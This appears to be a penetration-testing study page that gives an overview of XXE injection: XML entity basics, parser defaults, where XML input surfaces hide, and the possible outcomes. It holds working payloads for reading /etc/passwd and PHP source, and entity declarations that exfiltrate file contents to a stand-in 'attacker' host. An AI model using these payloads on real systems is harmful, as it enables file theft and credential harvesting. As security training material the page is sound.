XXE
When a web app processes XML from user input and the parser has external-entity resolution enabled, the operator can declare entities that point at server-side resources - local files, internal URLs, or even (with PHP’s expect://) shell commands. The vulnerability is mostly a function of using an outdated or poorly-configured XML library.
# 1. Find an XML input surface (SOAP, REST-with-XML, form data with Content-Type: application/xml,# SVG upload, DOCX/XLSX upload, anywhere "Content-Type: text/xml" or "application/xml" appears)
# 2. Prove entity resolution works<!DOCTYPE foo [<!ENTITY test "PROOF">]><root><field>&test;</field></root># → if the response reflects "PROOF" where the entity was, you're in
# 3. Read local file<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root><field>&xxe;</field></root>
# 4. Read source code via PHP filter wrapper<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">]><root><field>&xxe;</field></root>
# 5. Blind exfil via out-of-band DTD<!DOCTYPE foo [<!ENTITY % remote SYSTEM "http://attacker/x.dtd">%remote;%oob;]>Success indicator: a file’s contents (or its base64 encoding) appears in the application’s response, or the attacker’s listener receives an HTTP/DNS callback containing the file’s contents.
XML in one minute
Section titled “XML in one minute”XML is a structured text format using tags to nest elements:
<?xml version="1.0" encoding="UTF-8"?><email> <recipients> </recipients> <body>Hello, kindly share the invoice...</body></email>Key concepts:
| Concept | Example | Notes |
|---|---|---|
| Declaration | <?xml version="1.0" encoding="UTF-8"?> | First line; defines XML version and encoding |
| Element | <sender>...</sender> | Tag pair around content |
| Attribute | <email type="invoice"> | Key-value pairs on tags |
| Entity | &, <, &company; | Named placeholder; resolved at parse time |
| DTD (Document Type Definition) | <!DOCTYPE foo [ ... ]> | Schema and entity declarations |
The entity machinery is what makes XXE possible. An entity is a variable in XML - declared in the DTD, referenced in the document body with &name;. The XML parser performs the substitution at parse time.
Internal entities
Section titled “Internal entities”Declared and used in the same document:
<!DOCTYPE foo [ <!ENTITY greeting "Hello world">]><message>&greeting;</message>Parser resolves &greeting; to Hello world before the application sees the parsed XML. No security implication on its own.
External entities - the vulnerability
Section titled “External entities - the vulnerability”Entities can point at external resources:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]><message>&xxe;</message>When the parser resolves &xxe;, it reads /etc/passwd from disk and substitutes the file contents. The application then renders <message> containing the full passwd file. Vulnerability primitive: arbitrary file read.
Parameter entities
Section titled “Parameter entities”A second class of entities, prefixed with %, that can only be referenced inside the DTD:
<!DOCTYPE foo [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % wrapper "<!ENTITY exfil SYSTEM 'http://attacker/?%file;'>"> %wrapper;]><message>&exfil;</message>Parameter entities can be joined with other entities in ways general entities cannot. This is the mechanism for out-of-band exfiltration when the application doesn’t echo entity content back - see Blind exfil.
Why XXE exists
Section titled “Why XXE exists”XML parsers historically resolved external entities by default. The XML 1.0 spec doesn’t forbid it; security-conscious settings are opt-in. So apps using older XML libraries (libxml2 before 2.9, Java’s pre-2.0 SAX, .NET XmlReader without XmlResolver = null) inherit the unsafe default.
Modern parsers default to disabled external entities. But:
- Many legacy apps still run on outdated XML stacks
- Some apps re-enable external entities for legitimate reasons (XML schema validation against external schemas) without realizing the implications
- Document-processing chains (SVG → image, DOCX → text extraction) may invoke XML parsing transitively in components the developer doesn’t think of as “XML parsers”
The result: XXE remains common enough that OWASP lists it under A05:2021 (Security Misconfiguration) and A04:2021 (Insecure Design) - see also its prior dedicated A4:2017 ranking.
Where to find XML input
Section titled “Where to find XML input”| Surface | Indicator |
|---|---|
| SOAP API | Content-Type: text/xml; charset=utf-8, SOAPAction: header |
| REST with XML body | Content-Type: application/xml (sometimes accepted alongside JSON via content negotiation) |
| RSS/Atom feed ingestion | ”Subscribe to feed”, URL-input fields that fetch XML |
| SVG upload | SVG is XML; image-processors may parse it as XML |
| DOCX / XLSX / ODT upload | Office documents are ZIP archives of XML; some servers parse the embedded XML |
| Web form with XML body | Some apps switched from forms to XML internally but kept the form UI |
| WS-Trust / SAML / WS-Federation | All XML-based protocols |
| JNLP, BPMN, OWL, KML, GPX | Niche XML formats; each is a potential XXE surface |
The “JSON API accepts XML on Content-Type swap” case is worth emphasizing. Some servers parse the body based on the Content-Type header - sending the same data but with Content-Type: application/xml instead of application/json and converting the body to XML can find unanticipated XML parsing paths.
Attack outcomes
Section titled “Attack outcomes”What XXE produces depends on the parser and the application:
| Outcome | Requirement | Where covered |
|---|---|---|
| File read (response-reflected) | Entity content is echoed in response | File disclosure |
| File read (blind) | No reflection, but parser supports parameter entities and external HTTP | Blind exfil |
| Source-code read | PHP target (via php://filter) or Java directory listing | File disclosure |
| SSRF | Parser supports HTTP schemes (http://, https://) | RCE and SSRF |
| RCE | PHP expect:// wrapper enabled (uncommon in modern installs) | RCE and SSRF |
| DoS via entity expansion | Modern parsers prevent; older ones don’t | RCE and SSRF |
| Windows hash theft | Windows host parsing UNC paths via \\attacker\share\file | Brief in RCE and SSRF |
The most common deliverable is file read - extracting /etc/passwd, configuration files with DB credentials, source code, SSH keys. From there, the engagement often pivots to lateral movement using harvested credentials.
What this cluster covers
Section titled “What this cluster covers”| Page | Focus |
|---|---|
| Identifying | Finding XML surfaces, the JSON-to-XML Content-Type pivot, the <!ENTITY test "value"> reflection probe |
| File disclosure | Basic file://, source-code via php://filter/convert.base64-encode, Java directory listing, high-value file targets |
| Blind exfil | CDATA wrap via external parameter entities, error-based exfil, full out-of-band HTTP exfil with hosted DTD |
| RCE and SSRF | PHP expect:// to webshell drop, internal port scanning, billion-laughs DoS, Windows UNC hash theft |
| Automation | XXEinjector tool walkthrough, request-file format, automated CDATA/error/OOB modes |
| Skill assessment chain | Capstone walkthrough - IDOR + verb tampering + XXE combining to read /flag.php |
Cross-cluster references
Section titled “Cross-cluster references”| Topic | Page |
|---|---|
| Reaching XXE via XSLT injection | XSLT injection |
| Reaching XXE via SVG upload | Limited uploads |
| SSRF as a primary class (XXE-SSRF is one delivery mechanism) | SSRF cluster |
| File-read patterns analogous to XXE | LFI cluster |
| Chained SOAP → XXE attacks | SSRF chained |
| Verb tampering inside XML endpoints | Verb tampering |
| IDOR-protected XML endpoints (admin-only event creation, etc.) | IDOR cluster |